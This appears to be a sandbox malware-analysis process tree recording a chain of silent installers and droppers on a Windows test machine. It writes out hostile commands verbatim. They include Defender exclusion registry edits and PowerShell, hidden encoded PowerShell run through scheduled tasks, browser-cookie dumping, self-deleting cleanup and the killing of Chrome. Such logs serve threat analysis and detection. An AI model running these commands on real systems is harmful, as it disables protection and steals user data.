C:\Users\Admin\AppData\Local\Temp\is-3BNA5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3BNA5.tmp\Setup.exe" /VERYSILENT97⤵PID:15784
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-3BNA5.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit98⤵PID:7356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f99⤵
- Kills process with taskkill
PID:18212 -
C:\Windows\SysWOW64\timeout.exetimeout /t 699⤵
- Delays execution with timeout.exe
PID:14820 -
C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\PictureLAb.exe" /Verysilent95⤵PID:13188
-
C:\Users\Admin\AppData\Local\Temp\is-ML4IK.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-ML4IK.tmp\PictureLAb.tmp" /SL5="$30904,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\PictureLAb.exe" /Verysilent96⤵PID:13756
-
C:\Users\Admin\AppData\Local\Temp\is-HQL9F.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HQL9F.tmp\Setup.exe" /VERYSILENT97⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\is-QAOK1.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QAOK1.tmp\Setup.tmp" /SL5="$40A40,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-HQL9F.tmp\Setup.exe" /VERYSILENT98⤵PID:9500
-
C:\Users\Admin\AppData\Local\Temp\is-F4KPA.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-F4KPA.tmp\HGT.exe" /S /UID=lab21499⤵PID:12572
-
C:\Users\Admin\AppData\Local\Temp\87-679ab-6a5-bb6bb-be6aa7e46cdc2\Lypaenosejae.exe"C:\Users\Admin\AppData\Local\Temp\87-679ab-6a5-bb6bb-be6aa7e46cdc2\Lypaenosejae.exe"100⤵PID:13676
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oofckad2.qjs\gaooo.exe & exit101⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\oofckad2.qjs\gaooo.exeC:\Users\Admin\AppData\Local\Temp\oofckad2.qjs\gaooo.exe102⤵PID:5940
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt103⤵PID:12836
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt103⤵PID:10700
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3oprcawq.oax\md7_7dfj.exe & exit101⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\3oprcawq.oax\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\3oprcawq.oax\md7_7dfj.exe102⤵PID:17504
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zfy1xumq.ck3\askinstall29.exe & exit101⤵PID:16612
-
C:\Users\Admin\AppData\Local\Temp\zfy1xumq.ck3\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\zfy1xumq.ck3\askinstall29.exe102⤵PID:15244
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe103⤵PID:10660
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe104⤵
- Kills process with taskkill
PID:16756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvsxliuz.elk\customer4.exe & exit101⤵PID:14140
-
C:\Users\Admin\AppData\Local\Temp\pvsxliuz.elk\customer4.exeC:\Users\Admin\AppData\Local\Temp\pvsxliuz.elk\customer4.exe102⤵PID:16648
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"103⤵PID:16148
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdk3nwc2.yhx\HookSetp.exe & exit101⤵PID:10592
-
C:\Users\Admin\AppData\Local\Temp\gdk3nwc2.yhx\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\gdk3nwc2.yhx\HookSetp.exe102⤵PID:14660
-
C:\ProgramData\4923603.54"C:\ProgramData\4923603.54"103⤵PID:9952
-
C:\ProgramData\411252.4"C:\ProgramData\411252.4"103⤵PID:15108
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cceipwg2.yl3\GcleanerWW.exe /mixone & exit101⤵PID:10676
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\41gm1nj5.5sn\privacytools5.exe & exit101⤵PID:4676
-
C:\Users\Admin\AppData\Local\Temp\41gm1nj5.5sn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\41gm1nj5.5sn\privacytools5.exe102⤵PID:7948
-
C:\Users\Admin\AppData\Local\Temp\41gm1nj5.5sn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\41gm1nj5.5sn\privacytools5.exe103⤵PID:6712
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\atuoit4y.oew\setup.exe /8-2222 & exit101⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\atuoit4y.oew\setup.exeC:\Users\Admin\AppData\Local\Temp\atuoit4y.oew\setup.exe /8-2222102⤵PID:9296
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Snowy-Shadow"103⤵PID:4940
-
C:\Program Files (x86)\Snowy-Shadow\7za.exe"C:\Program Files (x86)\Snowy-Shadow\7za.exe" e -p154.61.71.51 winamp-plugins.7z103⤵PID:10012
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Snowy-Shadow\setup.exe" -map "C:\Program Files (x86)\Snowy-Shadow\WinmonProcessMonitor.sys""103⤵PID:12220
-
C:\Program Files (x86)\Snowy-Shadow\setup.exe"C:\Program Files (x86)\Snowy-Shadow\setup.exe" -map "C:\Program Files (x86)\Snowy-Shadow\WinmonProcessMonitor.sys"104⤵PID:9916
-
C:\Program Files (x86)\Snowy-Shadow\7za.exe"C:\Program Files (x86)\Snowy-Shadow\7za.exe" e -p154.61.71.51 winamp.7z103⤵PID:12468
-
C:\Program Files (x86)\Snowy-Shadow\setup.exe"C:\Program Files (x86)\Snowy-Shadow\setup.exe" /8-2222103⤵PID:9972
-
C:\Program Files (x86)\Snowy-Shadow\setup.exe"C:\Program Files (x86)\Snowy-Shadow\setup.exe" /8-2222104⤵PID:9072
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f1jo0u5n.5um\MultitimerFour.exe & exit101⤵PID:13156
-
C:\Users\Admin\AppData\Local\Temp\f1jo0u5n.5um\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\f1jo0u5n.5um\MultitimerFour.exe102⤵PID:13520
-
C:\Users\Admin\AppData\Local\Temp\55OC59K0SQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\55OC59K0SQ\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104103⤵PID:8812
-
C:\Users\Admin\AppData\Local\Temp\55OC59K0SQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\55OC59K0SQ\multitimer.exe" 1 3.1616084226.60537d02a309c 104104⤵PID:12568
-
C:\Users\Admin\AppData\Local\Temp\55OC59K0SQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\55OC59K0SQ\multitimer.exe" 2 3.1616084226.60537d02a309c105⤵PID:14452
-
C:\Users\Admin\AppData\Local\Temp\pvuim4q4ten\vict.exe"C:\Users\Admin\AppData\Local\Temp\pvuim4q4ten\vict.exe" /VERYSILENT /id=535106⤵PID:7000
-
C:\Users\Admin\AppData\Local\Temp\is-74281.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-74281.tmp\vict.tmp" /SL5="$A0A32,870426,780800,C:\Users\Admin\AppData\Local\Temp\pvuim4q4ten\vict.exe" /VERYSILENT /id=535107⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\is-C6Q67.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-C6Q67.tmp\wimapi.exe" 535108⤵PID:14840
-
C:\Users\Admin\AppData\Local\Temp\ze1aof53qqe\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ze1aof53qqe\Setup3310.exe" /Verysilent /subid=577106⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\is-RBNNO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-RBNNO.tmp\Setup3310.tmp" /SL5="$C0820,138429,56832,C:\Users\Admin\AppData\Local\Temp\ze1aof53qqe\Setup3310.exe" /Verysilent /subid=577107⤵PID:9416
-
C:\Users\Admin\AppData\Local\Temp\is-3RG9U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3RG9U.tmp\Setup.exe" /Verysilent108⤵PID:10488
-
C:\Users\Admin\AppData\Local\Temp\is-SRKOT.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SRKOT.tmp\Setup.tmp" /SL5="$80932,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-3RG9U.tmp\Setup.exe" /Verysilent109⤵PID:15660
-
C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\Delta.exe" /Verysilent110⤵PID:8604
-
C:\Users\Admin\AppData\Local\Temp\is-5KR03.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-5KR03.tmp\Delta.tmp" /SL5="$90596,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\Delta.exe" /Verysilent111⤵PID:480
-
C:\Users\Admin\AppData\Local\Temp\is-IBNBA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IBNBA.tmp\Setup.exe" /VERYSILENT112⤵PID:10736
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-IBNBA.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit113⤵PID:17876
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f114⤵
- Kills process with taskkill
PID:16856 -
C:\Windows\SysWOW64\timeout.exetimeout /t 6114⤵
- Delays execution with timeout.exe
PID:16260 -
C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\PictureLAb.exe" /Verysilent110⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\is-KBTS9.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-KBTS9.tmp\PictureLAb.tmp" /SL5="$A0596,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\PictureLAb.exe" /Verysilent111⤵PID:18280
-
C:\Users\Admin\AppData\Local\Temp\is-06U79.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-06U79.tmp\Setup.exe" /VERYSILENT112⤵PID:16020
-
C:\Users\Admin\AppData\Local\Temp\is-1BLFV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-1BLFV.tmp\Setup.tmp" /SL5="$40A28,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-06U79.tmp\Setup.exe" /VERYSILENT113⤵PID:9912
-
C:\Users\Admin\AppData\Local\Temp\is-E2HR6.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-E2HR6.tmp\HGT.exe" /S /UID=lab214114⤵PID:17492
-
C:\Users\Admin\AppData\Local\Temp\08-0c437-df4-893b7-bd9773ba3ccc3\ZHushaebujuhi.exe"C:\Users\Admin\AppData\Local\Temp\08-0c437-df4-893b7-bd9773ba3ccc3\ZHushaebujuhi.exe"115⤵PID:8636
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2k3zjcl.y45\gaooo.exe & exit116⤵PID:12516
-
C:\Users\Admin\AppData\Local\Temp\l2k3zjcl.y45\gaooo.exeC:\Users\Admin\AppData\Local\Temp\l2k3zjcl.y45\gaooo.exe117⤵PID:13360
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt118⤵PID:8012
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt118⤵PID:15716
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1j3kcci0.dk5\md7_7dfj.exe & exit116⤵PID:11560
-
C:\Users\Admin\AppData\Local\Temp\1j3kcci0.dk5\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\1j3kcci0.dk5\md7_7dfj.exe117⤵PID:6128
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\urtk4efx.js2\askinstall29.exe & exit116⤵PID:6724
-
C:\Users\Admin\AppData\Local\Temp\urtk4efx.js2\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\urtk4efx.js2\askinstall29.exe117⤵PID:14300
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe118⤵PID:12240
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe119⤵
- Kills process with taskkill
PID:6620 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\te4rfcs4.e3s\customer4.exe & exit116⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\te4rfcs4.e3s\customer4.exeC:\Users\Admin\AppData\Local\Temp\te4rfcs4.e3s\customer4.exe117⤵PID:15664
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"118⤵PID:14632
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxvvayev.aa5\HookSetp.exe & exit116⤵PID:7344
-
C:\Users\Admin\AppData\Local\Temp\vxvvayev.aa5\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\vxvvayev.aa5\HookSetp.exe117⤵PID:12880
-
C:\ProgramData\4662584.51"C:\ProgramData\4662584.51"118⤵
- Checks whether UAC is enabled
- Modifies registry class
PID:9980 -
C:\ProgramData\7673469.84"C:\ProgramData\7673469.84"118⤵PID:5556
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eh2qhrkj.toy\GcleanerWW.exe /mixone & exit116⤵PID:13600
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jestsafe.a3b\privacytools5.exe & exit116⤵PID:17912
-
C:\Users\Admin\AppData\Local\Temp\jestsafe.a3b\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jestsafe.a3b\privacytools5.exe117⤵PID:16180
-
C:\Users\Admin\AppData\Local\Temp\jestsafe.a3b\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\jestsafe.a3b\privacytools5.exe118⤵PID:6320
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ah0forph.0li\setup.exe /8-2222 & exit116⤵PID:5860
-
C:\Users\Admin\AppData\Local\Temp\ah0forph.0li\setup.exeC:\Users\Admin\AppData\Local\Temp\ah0forph.0li\setup.exe /8-2222117⤵PID:10608
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Delicate-Violet"118⤵PID:16768
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b3kyvpzq.amj\MultitimerFour.exe & exit116⤵PID:9668
-
C:\Users\Admin\AppData\Local\Temp\b3kyvpzq.amj\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\b3kyvpzq.amj\MultitimerFour.exe117⤵PID:14900
-
C:\Users\Admin\AppData\Local\Temp\5DR6GB1MVP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5DR6GB1MVP\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104118⤵PID:11412
-
C:\Users\Admin\AppData\Local\Temp\LHQXFETNTH\setups.exe"C:\Users\Admin\AppData\Local\Temp\LHQXFETNTH\setups.exe" ll118⤵PID:16548
-
C:\Users\Admin\AppData\Local\Temp\is-9HSL0.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-9HSL0.tmp\setups.tmp" /SL5="$1F0950,549376,61440,C:\Users\Admin\AppData\Local\Temp\LHQXFETNTH\setups.exe" ll119⤵PID:15796
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ayjsh2zg.l5x\setup.exe /S /kr /site_id=754 & exit116⤵PID:984
-
C:\Users\Admin\AppData\Local\Temp\ayjsh2zg.l5x\setup.exeC:\Users\Admin\AppData\Local\Temp\ayjsh2zg.l5x\setup.exe /S /kr /site_id=754117⤵PID:6456
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"118⤵PID:4920
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&119⤵PID:18224
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32120⤵PID:6296
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64120⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JSC6M.tmp\hjjgaa.exe" /Verysilent110⤵PID:15212
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt111⤵PID:13640
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt111⤵PID:15000
-
C:\Users\Admin\AppData\Local\Temp\ezb2yeiyixs\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ezb2yeiyixs\askinstall24.exe"106⤵PID:15936
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe107⤵PID:5992
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe108⤵
- Kills process with taskkill
PID:5480 -
C:\Users\Admin\AppData\Local\Temp\zevd0b1h1pk\2g4nbq3v0ey.exe"C:\Users\Admin\AppData\Local\Temp\zevd0b1h1pk\2g4nbq3v0ey.exe" /ustwo INSTALL106⤵PID:9556
-
C:\Users\Admin\AppData\Local\Temp\laz5xm5wr4j\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\laz5xm5wr4j\AwesomePoolU1.exe"106⤵PID:14340
-
C:\Users\Admin\AppData\Local\Temp\8HAH51LYJJ\setups.exe"C:\Users\Admin\AppData\Local\Temp\8HAH51LYJJ\setups.exe" ll103⤵PID:17128
-
C:\Users\Admin\AppData\Local\Temp\is-VGQUD.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-VGQUD.tmp\setups.tmp" /SL5="$80940,549376,61440,C:\Users\Admin\AppData\Local\Temp\8HAH51LYJJ\setups.exe" ll104⤵PID:9796
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w03yqm3g.ds3\setup.exe /S /kr /site_id=754 & exit101⤵PID:8464
-
C:\Users\Admin\AppData\Local\Temp\w03yqm3g.ds3\setup.exeC:\Users\Admin\AppData\Local\Temp\w03yqm3g.ds3\setup.exe /S /kr /site_id=754102⤵PID:9320
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"103⤵PID:15368
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&104⤵PID:15480
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32105⤵PID:8392
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64105⤵PID:18412
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggJGkGpBF" /SC once /ST 11:58:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="103⤵
- Creates scheduled task(s)
PID:17132 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggJGkGpBF"103⤵PID:16340
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggJGkGpBF"103⤵PID:14140
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Gawfomy.exe\" nh /site_id 754 /S" /V1 /F103⤵
- Creates scheduled task(s)
PID:10668 -
C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\hjjgaa.exe" /Verysilent95⤵PID:6164
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt96⤵PID:9376
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt96⤵PID:15232
-
C:\Users\Admin\AppData\Local\Temp\jsu0npsvtuo\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\jsu0npsvtuo\AwesomePoolU1.exe"91⤵PID:10904
-
C:\Users\Admin\AppData\Local\Temp\VGADPVHK3A\setups.exe"C:\Users\Admin\AppData\Local\Temp\VGADPVHK3A\setups.exe" ll88⤵PID:15552
-
C:\Users\Admin\AppData\Local\Temp\is-G1GRQ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-G1GRQ.tmp\setups.tmp" /SL5="$4090E,549376,61440,C:\Users\Admin\AppData\Local\Temp\VGADPVHK3A\setups.exe" ll89⤵PID:7916
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vl1akvll.gwc\setup.exe /S /kr /site_id=754 & exit86⤵PID:11820
-
C:\Users\Admin\AppData\Local\Temp\vl1akvll.gwc\setup.exeC:\Users\Admin\AppData\Local\Temp\vl1akvll.gwc\setup.exe /S /kr /site_id=75487⤵PID:14996
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"88⤵PID:6472
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&89⤵PID:12804
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3290⤵PID:15100
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6490⤵PID:13448
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHfuUlTfh" /SC once /ST 05:29:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="88⤵PID:3956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHfuUlTfh"88⤵PID:1056
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHfuUlTfh"88⤵PID:18332
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\kHLfCUP.exe\" nh /site_id 754 /S" /V1 /F88⤵PID:15956
-
C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\hjjgaa.exe" /Verysilent80⤵PID:13820
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt81⤵PID:3240
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt81⤵PID:13832
-
C:\Users\Admin\AppData\Local\Temp\1g4vbizjrpd\04bw0ts22pl.exe"C:\Users\Admin\AppData\Local\Temp\1g4vbizjrpd\04bw0ts22pl.exe" /ustwo INSTALL76⤵PID:6528
-
